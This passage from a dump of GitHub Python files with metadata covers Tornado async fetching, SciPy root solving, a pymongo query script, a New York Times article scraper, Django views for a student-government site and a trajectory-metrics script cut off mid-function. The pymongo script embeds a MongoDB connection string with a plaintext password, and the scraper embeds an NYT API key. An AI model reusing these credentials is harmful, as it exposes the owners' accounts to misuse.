"C01a_aufg_a_plot.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 9, "usage_type": "call"}, {"api_name": "C01_aufg_a.t", "line_number": 10, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.U", "line_number": 10, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.U_inf", "line_number": 10, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.t", "line_number": 20, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.U_pos", "line_number": 20, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.params", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "8648095647", "text": "from tornado import gen\nfrom tornado.httpclient import AsyncHTTPClient\nfrom tornado.ioloop import IOLoop\n\n\n@gen.coroutine\ndef fetch1(url):\n http_client = AsyncHTTPClient()\n response = yield http_client.fetch(url)\n return response.body\n\n\nasync def fetch2(url):\n http_client = AsyncHTTPClient()\n response = await http_client.fetch(url)\n return response.body\n\n\n@gen.coroutine\ndef fetch3(url):\n http_client = AsyncHTTPClient()\n fetch_future = http_client.fetch(url)\n future = gen.Future()\n\n def callback(f):\n result = f.result().body\n print('Done: ', future.done())\n future.set_result(result)\n print('Done: ', future.done())\n\n fetch_future.add_done_callback(callback)\n return (\n yield future\n )\n\n\n@gen.coroutine\ndef fetch4(url):\n http_client = AsyncHTTPClient()\n responses = [\n http_client.fetch(url),\n http_client.fetch(url)\n ]\n results = []\n for i in (yield 
responses):\n        print('-', i.body)\n        results.append(i.body)\n    return results\n\n\n@gen.coroutine\ndef run_tasks():\n    tasks = [\n        fetch1('http://example.com'),\n        fetch2('http://example.com'),\n        fetch3('http://example.com'),\n        fetch4('http://example.com'),\n    ]\n    for r in (yield gen.multi(tasks)):\n        print(r)\n    print('done')\n\n\nIOLoop.current().run_sync(run_tasks)\n", "repo_name": "syurskyi/Python_Topics", "sub_path": "110_concurrency_parallelism/001_asynchronous/examples/ITVDN_Python_Advanced/_tornado/example4_async_client.py", "file_name": "example4_async_client.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 8, "usage_type": "call"}, {"api_name": "tornado.gen.coroutine", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 6, "usage_type": "name"}, {"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 14, "usage_type": "call"}, {"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 21, "usage_type": "call"}, {"api_name": "tornado.gen.Future", "line_number": 23, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 23, "usage_type": "name"}, {"api_name": "tornado.gen.coroutine", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 19, "usage_type": "name"}, {"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 39, "usage_type": "call"}, {"api_name": "tornado.gen.coroutine", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 37, "usage_type": "name"}, {"api_name": "tornado.gen.multi", "line_number": 59, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 59, "usage_type": "name"}, {"api_name": "tornado.gen.coroutine", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 51, "usage_type": "name"}, {"api_name": "tornado.ioloop.IOLoop.current", "line_number": 64, "usage_type": "call"}, {"api_name": "tornado.ioloop.IOLoop", "line_number": 64, "usage_type": "name"}]}
{"seq_id": "72325859045", "text": "from scipy import optimize as opt\r\nimport numpy as np\r\n\r\ndef f1(nums):\r\n    x = nums\r\n    f = np.zeros(1)\r\n    f[0] = 2 ** x + 5 * x - 3\r\n    return f\r\n\r\ndef f2(nums):\r\n    x, y = nums\r\n    f = np.zeros(2)\r\n    f[0] = 2 * x + np.cos(y)\r\n    f[1] = np.sin(x + 1) - y\r\n    return f\r\n\r\nif __name__ == '__main__':\r\n    sol = opt.root(f1, np.zeros(1), method='krylov')\r\n    print(sol.x)\r\n    sol = opt.root(f2, np.array([2, 1.2]), method='krylov')\r\n    print(sol.x)", "repo_name": "Arthur-Badretdinov/MyProjects", "sub_path": "Scipy2_1/Scipy2_1.py", "file_name": "Scipy2_1.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 14, "usage_type": "call"}, {"api_name": "scipy.optimize.root", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.optimize.root", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}]}
{"seq_id": "24994838382", "text": "# Load the pymongo package\nimport pymongo\nimport certifi\nfrom bson.objectid import ObjectId\n\n# Connect to the MongoDB cloud database\n\nclient = pymongo.MongoClient(\n    \"mongodb+srv://root:112611You@mycluster.d222soe.mongodb.net/?retryWrites=true&w=majority\",\n    tlsCAFile=certifi.where(),\n)\n# Put data into the database\ndb = client.website  # select the database to operate on\n\ncollection = db.users  # select the users collection to operate on\n\n# Get the first document in the collection\n# data=collection.find_one()\n# Get a document by its ObjectId\n# data = collection.find_one(ObjectId(\"64326c95cbad3845acb618a8\"))\n# Get fields from the document\n# print(data[\"_id\"])\n# print(data[\"name\"])\n# print(data)\n# Get multiple documents at once\ncursor = collection.find()\nfor doc in cursor:\n    print(doc[\"name\"])\n", "repo_name": "cfy1126/python", "sub_path": "mongo-practice-r.py", "file_name": "mongo-practice-r.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "certifi.where", "line_number": 10, "usage_type": "call"}]}
{"seq_id": "35965408802", "text": "\n# coding: utf-8\n\n# In[82]:\n\nimport csv\nimport nytimesarticle\nfrom nytimesarticle import articleAPI\napi = articleAPI('4a7645206171440aa6064abf7d8a764b')\n\n\ndef parse_articles(articles):\n    '''\n    This function takes in a response to the NYT api and parses\n    the articles into a list of dictionaries\n    '''\n    news = []\n    if 'response' in articles :\n        for i in articles[\"response\"][\"docs\"]:\n            dic = {}\n            #dic['id'] = i['_id']\n\n            #dic['headline'] = i['headline']['main'].encode(\"utf8\")\n\n           # dic['date'] = i['pub_date'][0:10]\n\n            #dic['source'] = i['source']\n            #dic['type'] = i['type_of_material']\n            dic['url'] = i['web_url']\n            #dic['word_count'] = i['word_count']\n            news.append(dic)\n    return(news) \n\n\nall_articles = []\nfor i in range(0,100):\n    articles = api.search(q = \"olympics\",\n           #begin_date = 20180101,\n           #end_date = 20180115,\n           page = i)\n    articles = parse_articles(articles)\n    all_articles = all_articles + articles\n    \n    \nimport csv\nkeys = all_articles[0].keys()\noutputfile = open('E:/dic_sample_data_new/article_url_olympics_test.csv', 'w',newline='') \ndict_writer = csv.DictWriter(outputfile,keys)\ndict_writer.writerows(all_articles)\noutputfile.close()\n\n\n# In[83]:\n\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\nimport urllib.request\nimport csv\n\n\ndef tag_visible(element):\n    if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:\n        return False\n    if isinstance(element, Comment):\n        return False\n    return True\n\n\ndef text_from_html(body):\n    soup = BeautifulSoup(body, 'html.parser')\n    texts = soup.findAll(text=True)\n    visible_texts = filter(tag_visible, texts) \n    return u\" \".join(t.strip() for t in visible_texts)\n\n\ni=1\nwith open ('E:/dic_sample_data_new/article_url_olympics_test.csv') as csvDataFile:\n    csvReader = csv.reader(csvDataFile)\n    for row in csvReader:\n        html = urllib.request.urlopen(row[0]).read()\n        outputfile = open(\"E:/dic_sample_data_new/article_olympics_test%s.txt\" %i,\"w\",encoding=\"utf-8\")\n        i+=1\n        outputfile.write(text_from_html(html))\n        outputfile.close()\n    \n\n\n# In[ ]:\n\n\n\n", "repo_name": "vigneshwaran-v/Document-classification-using-Apache-Spark", "sub_path": "data_collection_code/data_collection.py", "file_name": 
"data_collection.py", "file_ext": "py", "file_size_in_byte": 2250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nytimesarticle.articleAPI", "line_number": 9, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 48, "usage_type": "call"}, {"api_name": "bs4.element.Comment", "line_number": 64, "usage_type": "argument"}, {"api_name": "bs4.BeautifulSoup", "line_number": 70, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 78, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 80, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 80, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "73936568166", "text": "import datetime\nimport itertools\nimport os\nimport random\nimport requests\nimport StringIO\nimport time\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.management import call_command\nfrom django.core.paginator import Paginator\nfrom django.core.servers.basehttp import FileWrapper\nfrom django.db.models import Q\nfrom django.http import StreamingHttpResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.template import RequestContext\nfrom django.utils import timezone\nfrom easy_pdf.views import PDFTemplateView\nfrom models import *\nfrom forms import *\n\ndef home(request):\n current_time = timezone.now()\n alerts = Alert.objects.filter(start_time__lte=current_time,\n end_time__gt=current_time)\n news = News.objects.order_by('-date_posted')[:2]\n bills = Legislation.objects.all()[:5]\n news_links = NewsLink.objects.order_by('-date_published')[:5]\n slides = HomepageSlide.objects.filter(active=True)\n calendars = GoogleCalendar.objects.filter(show_on_homepage=True)\n return render(request, 'home.html', locals())\n\ndef page(request, page_slug):\n page = get_object_or_404(Page, slug=page_slug)\n return render(request, 'page.html', locals())\n\ndef for_students(request):\n users = 'Student'\n desc = \"ASG has all the info you need to know about what's happening every week, how to work with a faculty member, how to propose a new project, and more. Our online services help you find a job, sell/buy your books, and get a cab, while our fairs provide opportunities to connect with student groups and find off-campus housing.\"\n resources = Resource.objects.filter(type='R', users='ST', is_active=True)\n services = Resource.objects.filter(type='S', users='ST', is_active=True)\n return render(request, 'resources.html', locals())\n\ndef for_groups(request):\n users = 'Student Group'\n desc = 'Want to know how to start a new student group, finance it, or publicize it? Check out our 2013-14 Student Handbook for all this and more. 
Also be sure to read the PR Guide for info on how to flyer, reserve rooms and tables, advertise, and print.'\n resources = Resource.objects.filter(type='R', users='SG', is_active=True)\n services = Resource.objects.filter(type='S', users='SG', is_active=True)\n return render(request, 'resources.html', locals())\n\ndef calendar(request):\n page_name = 'Calendar'\n calendars = GoogleCalendar.objects.filter(display_on_calendar_page=True)\n return render(request, 'calendar.html', locals())\n\ndef office_hours(request):\n page_name = 'Office Hours'\n office_hours = True\n calendars = GoogleCalendar.objects.filter(is_office_hours=True)\n return render(request, 'calendar.html', locals())\n\nnews_per_page = 10\ndef list_news(request):\n all_news = News.objects.order_by('-date_posted')\n p = Paginator(all_news, news_per_page)\n last_page = p.num_pages\n pages = xrange(1, last_page+1)\n page = int(request.GET.get('page', 1))\n news = p.page(page).object_list\n return render(request, 'list_news.html', locals())\n\nlegislation_per_page = 10\ndef list_legislation(request):\n all_legislation = Legislation.objects.order_by('-status_date', '-code')\n p = Paginator(all_legislation, legislation_per_page)\n last_page = p.num_pages\n pages = xrange(1, last_page+1)\n page = int(request.GET.get('page', 1))\n bills = p.page(page).object_list\n return render(request, 'list_legislation.html', locals())\n\nnews_links_per_page = 10\ndef list_news_links(request):\n all_news_links = NewsLink.objects.order_by('-date_published')\n p = Paginator(all_news_links, news_links_per_page)\n last_page = p.num_pages\n pages = xrange(1, last_page+1)\n page = int(request.GET.get('page', 1))\n news_links = p.page(page).object_list\n return render(request, 'list_news_links.html', locals())\n\ndef news(request, year, month, slug):\n from_homepage = 'from_homepage' in request.GET\n news = get_object_or_404(News, date_posted__year=year, date_posted__month=month, slug=slug)\n return render(request, 'news.html', locals())\n\ndef contact(request):\n exec_board_positions = Position.objects.filter(on_exec_board=True)\n senate_leadership_positions = Position.objects.filter(senate_leadership=True)\n return render(request, 'contact.html', locals())\n\ndef cabinet(request):\n exec_members = Person.objects.filter(positions__on_exec_board=True)\\\n .order_by('positions__order')\n return render(request, 'cabinet.html', locals())\n\ndef senators(request):\n senators = Person.objects.filter(positions__name='Senator').order_by('groups_represented')\n return render(request, 'senators.html', locals())\n\ndef projects(request):\n # iterator() doesn't supply count()\n projects = list(Project.objects.filter(active=True))\n random.shuffle(projects)\n return render(request, 'projects.html', locals())\n\ndef committees(request):\n committees = list(Committee.objects.filter(show_in_list=True))\n random.shuffle(committees)\n return render(request, 'committees.html', locals())\n\ndef view_project(request, id):\n project = get_object_or_404(Project, id=int(id))\n return render(request, 'view_project.html', locals())\n\ndef people(request, id):\n 'Display the profile of a single person'\n person = get_object_or_404(Person, id=int(id))\n return render(request, 'person.html', locals())\n\nTUMBLR_API_KEY = os.environ['TUMBLR_API_KEY']\ndef parse_post_date(post):\n post['date'] = datetime.datetime.strptime(post['date'], '%Y-%m-%d %H:%M:%S GMT')\n\ndef blog(request):\n api_url = 'http://api.tumblr.com/v2/blog/nu-asg.tumblr.com/posts/text?api_key=%s' % TUMBLR_API_KEY\n 
response = requests.get(api_url)\n posts = response.json()['response']['posts']\n map(parse_post_date, posts)\n return render(request, 'blog.html', locals())\n\ndef login_user(request):\n if request.method == 'GET':\n if request.user.is_authenticated():\n return redirect('/edit_profile/')\n auth_form = ASGAuthForm()\n elif request.method == 'POST':\n auth_form = ASGAuthForm(request.POST)\n user = authenticate(username=request.POST['username'],\n password=request.POST['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n try:\n person = Person.objects.get(user=user)\n except Person.DoesNotExist:\n # This is a superuser\n return redirect('/admin/')\n return redirect(settings.LOGIN_REDIRECT_URL)\n else:\n login_error = 'Your account has been deactivated'\n else:\n login_error = 'Invalid username or password'\n return render(request, 'login.html', locals())\n\n@login_required\ndef edit_profile(request):\n 'A page for the logged-in user to edit his/her own profile'\n person = get_object_or_404(Person, user=request.user)\n if request.method == 'GET':\n person_form = PersonForm(instance=person)\n elif request.method == 'POST':\n # User submitted the form; update fields\n person_form = PersonForm(request.POST, request.FILES, instance=person)\n if person_form.is_valid():\n # Save the updated data\n person_form.save()\n update_success = True\n person_form = PersonForm(instance=person)\n return render(request, 'edit_profile.html', locals())\n\n\n# When a visitor selects a senator as \"My senator\"\ndef select_senator(request):\n if 'senator_id' in request.GET:\n request.session['my_senator'] = int(request.GET['senator_id'])\n elif 'clear' in request.GET:\n request.session.pop('my_senator', None)\n return redirect('/senators/#table')\n\n\n\n\n\n# For views limited to ASG exec members\ndef exec_required(view_fn):\n def _view_fn(*args, **kwargs):\n if args[0].user.groups.filter(name='Exec Board Members').count() > 0:\n return view_fn(*args, **kwargs)\n return redirect('/login/')\n return _view_fn\n\n@exec_required\ndef exec_tools(request):\n committees = Committee.objects.iterator()\n return render(request, 'exec_tools.html', locals())\n\n@exec_required\ndef export_roster(request):\n roster = StringIO.StringIO()\n call_command('output_roster', output_dest=roster)\n roster.seek(0) # rewind StringIO to beginning (like a file)\n response = StreamingHttpResponse(FileWrapper(roster), content_type='application/csv')\n response['Content-Disposition'] = 'attachment; filename=asg_roster.csv'\n return response\n\nclass ProjectsPDF(PDFTemplateView):\n template_name = 'pdf/projects.html'\n\n def get_context_data(self, **kwargs):\n return super(ProjectsPDF, self).get_context_data(\n pagesize='letter',\n title='ASG Projects summary',\n projects=Project.objects.filter(active=True).iterator(),\n today=timezone.now(),\n **kwargs\n )\n\nclass ResourcesPDF(PDFTemplateView):\n template_name = 'pdf/resources.html'\n\n def get_context_data(self, **kwargs):\n return super(ResourcesPDF, self).get_context_data(\n pagesize='letter',\n title='ASG Resources summary',\n resources=Resource.objects.filter(is_active=True).iterator(),\n today=timezone.now(),\n **kwargs\n )\n\n", "repo_name": "nuasg/asg.northwestern.edu", "sub_path": "asg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": 
"call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 71, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 86, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 96, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 106, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 110, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 116, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 121, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 132, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 138, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 150, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 159, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 160, "usage_type": "call"}, {"api_name": "django.conf.settings.LOGIN_REDIRECT_URL", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 165, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 170, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 181, "usage_type": 
"call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 167, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 201, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 207, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 211, "usage_type": "call"}, {"api_name": "django.core.management.call_command", "line_number": 212, "usage_type": "call"}, {"api_name": "django.http.StreamingHttpResponse", "line_number": 214, "usage_type": "call"}, {"api_name": "django.core.servers.basehttp.FileWrapper", "line_number": 214, "usage_type": "call"}, {"api_name": "easy_pdf.views.PDFTemplateView", "line_number": 218, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 226, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 226, "usage_type": "name"}, {"api_name": "easy_pdf.views.PDFTemplateView", "line_number": 230, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 238, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 238, "usage_type": "name"}]} +{"seq_id": "4657706703", "text": "import argparse\nimport json\nimport warnings\nfrom itertools import cycle\nfrom pathlib import Path\nfrom pprint import pprint\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport yaml\nfrom evaluate_trajectories import MOTMetrics\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef _plt_hist(df, dst_dir, save):\n print(\"Plotting histogram...\")\n plt.hist(df.error_offline, bins=60, stacked=True, log=True, density=True)\n _, ymax = plt.ylim()\n plt.title(\"Histogram of errors (60 bins)\")\n plt.axvline(\n df.error_offline.mean(),\n linestyle=\"dashed\",\n label=f\"Mean: {df.error_offline.mean():.2f}\",\n color=\"b\",\n )\n plt.axvline(\n df.error_offline.median(),\n linestyle=\"dotted\",\n label=f\"Median: {df.error_offline.median():.2f}\",\n color=\"r\",\n )\n plt.xlabel(\"Error\")\n plt.ylabel(\"Count\")\n plt.legend()\n if save:\n plt.savefig((dst_dir / \"histogram.pdf\").as_posix())\n plt.clf()\n else:\n plt.show()\n print(\"Done!\")\n\n\ndef _plt_hist_no_outliers(df, dst_dir, save):\n print(\"Plotting histogram w/o outliers...\")\n errs = df.where(df.error_offline < df.error_offline.std()).error_offline\n plt.hist(\n errs, bins=60, stacked=True, log=True, density=True,\n )\n _, ymax = plt.ylim()\n plt.title(\"Histogram of errors < stddev (60 bins)\")\n plt.axvline(\n errs.mean(), linestyle=\"dashed\", label=f\"Mean: {errs.mean():.2f}\", color=\"b\",\n )\n plt.axvline(\n errs.median(),\n linestyle=\"dotted\",\n label=f\"Median: {errs.median():.2f}\",\n color=\"r\",\n )\n plt.xlabel(\"Error\")\n plt.ylabel(\"Count\")\n plt.legend()\n if save:\n plt.savefig((dst_dir / \"histogram_no_outliers.pdf\").as_posix())\n plt.clf()\n else:\n plt.show()\n print(\"Done!\")\n\n\ndef _plt_error_by_dist(df, dst_dir, save):\n print(\"Plotting error_offline by distance...\")\n plt.title(\"Distance vs. 
Error\")\n markers = cycle(range(0, 11))\n colors = cycle(plt.cm.Spectral(np.linspace(0, 1, 100)).tolist())\n for scene in df.scene.unique():\n marker = next(markers)\n for obj in df[df.scene == scene].object_id.unique():\n obj_df = df.where(df.scene == scene).where(df.object_id == obj)\n plt.scatter(\n obj_df.error_offline,\n obj_df.distance,\n color=next(colors),\n marker=marker,\n label=f\"{scene}, {obj}\",\n )\n plt.xlabel(\"Error [m]\")\n plt.ylabel(\"Distance [m]\")\n # plt.legend(loc=\"upper right\")\n if save:\n plt.savefig((dst_dir / \"error_vs_dist.pdf\").as_posix())\n plt.clf()\n else:\n plt.show()\n print(\"Done\")\n\n\ndef _summarize_df_by_dist(df):\n dist_summary = {}\n df_close = df.loc[df.distance < 5]\n df_mid = df.loc[(df.distance >= 5) & (df.distance < 30)]\n df_far = df.loc[df.distance >= 30]\n dist_summary[\"close\"] = _get_metrics(df_close)\n dist_summary[\"mid\"] = _get_metrics(df_mid)\n dist_summary[\"far\"] = _get_metrics(df_far)\n return dist_summary\n\n\ndef _summarize_df(df):\n summary = {}\n summary[\"total\"] = _get_metrics(df)\n df_fully_visible = df.loc[(df.truncation_lvl == 0) & (df.occlusion_lvl == 0)]\n summary[\"fully-visible\"] = _get_metrics(df_fully_visible)\n obj_summary = {}\n df_ped = df.loc[df.obj_class == \"Pedestrian\"]\n df_car = df.loc[df.obj_class == \"Car\"]\n obj_summary[\"car\"] = _get_metrics(df_car)\n obj_summary[\"car\"].update(_summarize_per_obj(df_car))\n obj_summary[\"pedestrian\"] = _get_metrics(df_ped)\n obj_summary[\"pedestrian\"].update(_summarize_per_obj(df_ped))\n summary[\"obj-type\"] = obj_summary\n summary[\"distance\"] = _summarize_df_by_dist(df)\n summary[\"per-obj\"] = _summarize_per_obj(df, summarize_best_worst=True)\n return summary\n\n\ndef _summarize_best_worst(df, group, summarize_item):\n df_groupedby = df.groupby(group)\n mean_errors_offline = df_groupedby.error_offline.mean()\n median_errors_offline = df_groupedby.error_offline.median()\n mean_errors_online = df_groupedby.error_online.mean()\n median_errors_online = df_groupedby.error_online.median()\n summary = {}\n best = {}\n best_mean_offline = []\n best_mean_online = []\n for item in mean_errors_offline.nsmallest(n=3).items():\n best_mean_offline.append(summarize_item(df, item))\n for item in mean_errors_online.nsmallest(n=3).items():\n best_mean_online.append(summarize_item(df, item))\n best_median_offline = []\n best_median_online = []\n for item in median_errors_offline.nsmallest(n=3).items():\n best_median_offline.append(summarize_item(df, item))\n for item in median_errors_online.nsmallest(n=3).items():\n best_median_online.append(summarize_item(df, item))\n\n worst = {}\n worst_mean_offline = []\n worst_mean_online = []\n for item in mean_errors_offline.nlargest(n=3).items():\n worst_mean_offline.append(summarize_item(df, item))\n for item in mean_errors_online.nlargest(n=3).items():\n worst_mean_online.append(summarize_item(df, item))\n worst_median_offline = []\n worst_median_online = []\n for item in median_errors_offline.nlargest(n=3).items():\n worst_median_offline.append(summarize_item(df, item))\n for item in median_errors_online.nlargest(n=3).items():\n worst_median_online.append(summarize_item(df, item))\n\n best_offline = {}\n best_online = {}\n best_offline[\"median\"] = best_median_offline\n best_offline[\"mean\"] = best_mean_offline\n best_online[\"median\"] = best_median_online\n best_online[\"mean\"] = best_mean_online\n best[\"offline\"] = best_offline\n best[\"online\"] = best_online\n\n worst_offline = {}\n worst_online = {}\n 
worst_offline[\"median\"] = worst_median_offline\n worst_offline[\"mean\"] = worst_mean_offline\n worst_online[\"median\"] = worst_median_online\n worst_online[\"mean\"] = worst_mean_online\n worst[\"offline\"] = worst_offline\n worst[\"online\"] = worst_online\n summary[\"worst\"] = worst\n summary[\"best\"] = best\n return summary\n\n\ndef _summarize_per_obj(df, summarize_best_worst=False):\n obj_summary = {}\n df_groupedby_obj = df.groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"all\"] = _summarize_groupedby_obj(\n df_groupedby_obj, summarize_best_worst=summarize_best_worst\n )\n df_groupedby_obj_close = df.loc[\n df_groupedby_obj.distance.transform(\"mean\") < 5\n ].groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"close\"] = _summarize_groupedby_obj(df_groupedby_obj_close)\n df_groupedby_obj_mid = df.loc[\n df_groupedby_obj.distance.transform(\"mean\") < 30\n ].groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"mid\"] = _summarize_groupedby_obj(df_groupedby_obj_mid)\n df_groupedby_obj_far = df.loc[\n df_groupedby_obj.distance.transform(\"mean\") > 30\n ].groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"far\"] = _summarize_groupedby_obj(df_groupedby_obj_far)\n # outliers: close: num_objects * median error_offline gt 1\n # mid: num_objects * median error_offline gt 5\n # far: num_objects * median error_offline gt 10\n # divided by num objects from all\n num_outliers_close_offline = (\n obj_summary[\"close\"][\"num-objs\"]\n - obj_summary[\"close\"][\"offline\"][\"median-error-lt-1\"]\n )\n num_outliers_mid_offline = (\n obj_summary[\"mid\"][\"num-objs\"]\n - obj_summary[\"mid\"][\"offline\"][\"median-error-lt-5\"]\n )\n num_outliers_far_offline = (\n obj_summary[\"far\"][\"num-objs\"]\n - obj_summary[\"far\"][\"offline\"][\"median-error-lt-10\"]\n )\n num_outliers_offline = (\n num_outliers_close_offline + num_outliers_mid_offline + num_outliers_far_offline\n )\n num_outliers_close_online = (\n obj_summary[\"close\"][\"num-objs\"]\n - obj_summary[\"close\"][\"online\"][\"median-error-lt-1\"]\n )\n num_outliers_mid_online = (\n obj_summary[\"mid\"][\"num-objs\"]\n - obj_summary[\"mid\"][\"online\"][\"median-error-lt-5\"]\n )\n num_outliers_far_online = (\n obj_summary[\"far\"][\"num-objs\"]\n - obj_summary[\"far\"][\"online\"][\"median-error-lt-10\"]\n )\n num_outliers_online = (\n num_outliers_close_online + num_outliers_mid_online + num_outliers_far_online\n )\n num_objs = obj_summary[\"all\"][\"num-objs\"]\n if num_objs:\n obj_summary[\"outlier-ratio\"] = {}\n obj_summary[\"outlier-ratio\"][\"offline\"] = min(\n num_outliers_offline / num_objs, 1\n )\n obj_summary[\"outlier-ratio\"][\"online\"] = min(num_outliers_online / num_objs, 1)\n else:\n obj_summary[\"outlier-ratio\"] = \"NA\"\n return obj_summary\n\n\ndef _summarize_groupedby_obj(df_groupedby_obj, summarize_best_worst=False):\n 